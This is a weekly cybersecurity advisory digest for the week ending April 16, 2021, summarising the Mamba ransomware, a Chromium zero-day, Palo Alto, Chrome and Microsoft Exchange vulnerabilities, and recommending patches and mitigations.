Please see Security Advisories for the week ending April 16, 2021
- FBI Issues Alert on Mamba Ransomware
- Zero-Day Exploit for Google Chrome and Microsoft Edge
- New Palo Alto Networks Security Advisories
- Google Releases Security Updates for Chrome
- Microsoft April 2021 Security Updates to Mitigate Newly Disclosed Microsoft Exchange Vulnerabilities
- Updates on Microsoft Exchange Server Vulnerabilities
________________________________
FBI Issues Alert on Mamba Ransomware
Situation
The FBI has issued a warning about Mamba Ransomware that uses weaponized versions of legitimate, open-source encryption software DiskCryptor.
Problem
Mamba attacks begin with access to a system using exposed RDP ports or other unsecured methods of remote access. The attack then extracts a set of files and installs DiskCryptor and begins encrypting the system.
Implication
If DiskCryptor finishes running, it will lock out the system and demand ransom for the decryption key. If detected at an early stage, it is possible to get the password in the “myConf.txt” file.
Need
If an organization does not use DiskCryptor, it should be added to the blacklist. Other mitigations include network segmentation, requiring admin credentials to install software, disable unused RDP ports and monitor RDP logs, and using secure networks and VPNs.
________________________________
Zero-Day Exploit for Google Chrome and Microsoft Edge
Situation
A security researcher has released a zero-day remote code execution vulnerability (1195777) on Twitter that works on the current version of Google Chrome, Microsoft Edge, and likely other Chromium-based browsers. A zero-day vulnerability is a security bug that has been publicly disclosed but has not been patched in the released version of the affected software.
Problem
The PoC posted by the security researcher is also uploaded onto GitHub. It contains the PoC code as well as a video demonstrating the Remote Code Execution exploitation on Google Chrome version 89.0.4389.128. The zero-day Remote Code Execution vulnerabilities cannot escape from Chromium’s sandbox security feature, which is used to prevent exploits from executing code or accessing files on host computers. An attacker will need to chain this vulnerability with the sandbox escape exploit for it to succeed.
Implication
If an attacker is able successfully exploit this vulnerability either by chaining with sandbox escape exploit or because sandbox mode was disabled, then it could allow them to take control of the affected system.
Need
At the time of writing this there has been no patch released yet for this vulnerability. This vulnerability in its default state cannot harm users. It is recommended to update Google Chrome and Microsoft Edge as soon as updates are made available. Additional information can be found in the link below.
For a brief overview:
https://www.secpod.com/blog/second-zero-day-exploit-for-google-chrome-in-the-same-week/
________________________________
New Palo Alto Networks Security Advisories
Situation
Palo Alto Networks have released 4 security advisories that covers vulnerabilities for PAN-OS, GlobalProtect App, and Bridgecrew Checkov.
Problem
PAN-OS: Vulnerabilities were found which include secrets in system logs and admin secrets in web server logs.
GlobalProtect: A Denial-of-Service vulnerability in the Windows App was found.
BridgeCrew Checkov: An arbitrary code execution was found when processing a malicious terraform file.
Implication
PAN-OS: Cleartext sensitive information can be found in system logs and web server logs.
GlobalProtect: An attacker can send specifically crafted input to the app that causes a Windows Blue Screen of Death.
BridgeCrew Checkov: An attacker can run malicious code through a terraform file.
Need
Please update the above products to the latest versions.
For a more detailed description:
https://security.paloaltonetworks.com/
________________________________
Google Releases Security Updates for Chrome
Situation:
Google has updated the stable channel for Chrome to 90.0.4430.72 for Windows, Mac, and Linux. This new version also introduces a new design feature that attempts to establish web connections using HTTPS by default instead of HTTP, making the new version of the channel secure by design.
Problem:
The previous version contains 37 verified security vulnerabilities that could allow an attacker to compromise a system and take remote control of it. Google is currently keeping details of the vulnerabilities under restricted access until users have had sufficient opportunity to acquire the update.
Implication:
The vulnerabilities addressed in this update could be exploited by an attacker to take control of an affected system.
Need:
CISA encourages administrators and users to review Google’s release about the update.
Credit goes to those users who filed reports for these vulnerabilities as they were found, as well as the security researchers who helped prevent these vulnerabilities from reaching the stable channel.
For a brief desctription:
https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_14.html
________________________________
Apply Microsoft April 2021 Security Updates to Mitigate Newly Disclosed Microsoft Exchange Vulnerabilities
Situation
Microsoft has released security updates in the April 2021 patch that addresses vulnerabilities for Exchange Server 2016 and other Microsoft products.
Problem
This update addresses a large amount of security vulnerabilities in Exchange Server 2016 and other Microsoft products.
Implication
Attackers that exploit these vulnerabilities can gain access and maintain persistence on the target host.
Need
Apply the latest Microsoft updates for all Microsoft products.
For a more detailed description:
https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr
________________________________
Updates on Microsoft Exchange Server Vulnerabilities
Situation:
Cybersecurity and Infrastructure Security Agency has added two new Malware Analysis Reports to alert AA21-062A, Microsoft Exchange Server Vulnerabilities.
Problem:
CISA partners have detected two new exploitations of vulnerabilities in Microsoft Exchange Server products. The first one is MAR-10331466-1.v1, the “DearCry Ransomware” which encrypts files on a device and demands ransom in exchange for decrypting those files. The second is MAR-10330097-1.v1, the “China Chopper Webshell”, a web-based shell interface that may allow an attacker to remotely run JavaScript code on a compromised Exchange Server.
Implication:
Successful exploitation of these vulnerabilities allows an attacker to run arbitrary code on vulnerable Exchange Servers, enabling the attacker persistent system access, as well as access to mailboxes and files on the server, as well as credentials stored on the system. Successful exploitation may also enable the attacker to compromise trust and identity in a vulnerable network.
Need:
CISA recommends administrators and users to review the following resources for remediation and mitigation plans:
Mitigate Exchange Server Vulnerabilities
